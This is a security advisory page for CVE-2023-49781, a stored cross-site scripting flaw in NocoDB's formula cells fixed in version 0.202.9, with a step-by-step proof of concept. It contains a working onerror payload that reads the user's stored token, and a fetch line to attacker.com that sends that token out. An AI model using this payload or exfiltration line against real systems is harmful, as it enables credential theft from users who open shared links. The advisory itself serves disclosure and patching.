logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2023-49781 nocodb

Package

Manager: npm
Name: nocodb
Vulnerable Version: >=0 <0.202.9

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00955 pctl0.75535

Details

NocoDB Vulnerable to Stored Cross-Site Scripting in Formula.vue ### Summary A stored cross-site scripting vulnerability exists within the Formula virtual cell comments functionality. ### Details The nc-gui/components/virtual-cell/Formula.vue displays a v-html tag with the value of "urls" whose contents are processed by the function replaceUrlsWithLink(). This function recognizes the pattern URI::(XXX) and creates a hyperlink tag <a> with href=XXX. However, it leaves all the other contents outside of the pattern URI::(XXX) unchanged, which makes the evil users can create a malicious table with a formula field whose payload is <img src=1 onerror="malicious javascripts"URI::(XXX). The evil users then can share this table with others by enabling public viewing and the victims who open the shared link can be attacked. ### PoC Step 1: Attacker login the nocodb and creates a table with two fields, "T" and "F". The type of field "T" is "SingleLineText", and the type of the "F" is "Fomula" with the formula content {T} Step 2: The attacker sets the contents of T using <img src=1 onerror=alert(localStorage.getItem('nocodb-gui-v2'))URI::(XXX) Step 3: The attacker clicks the "Share" button and enables public viewing, then copies the shared link and sends it to the victims Step 4: Any victims who open the shared link in their browsers will see the alert with their confidential tokens stored in localStorage The attackers can use the fetch([http://attacker.com/?localStorage.getItem('nocodb-gui-v2')](http://attacker.com/?localStorage.getItem(%27nocodb-gui-v2%27))) to replace the alert and then steal the victims' credentials in their attacker.com website. ### Impact Stealing the credentials of NocoDB user that clicks the malicious link.

Metadata

Created: 2024-05-13T19:59:07Z
Modified: 2025-08-21T19:15:36Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/05/GHSA-h6r4-xvw6-jc5h/GHSA-h6r4-xvw6-jc5h.json
CWE IDs: ["CWE-79"]
Alternative ID: GHSA-h6r4-xvw6-jc5h
Finding: F425
Auto approve: 1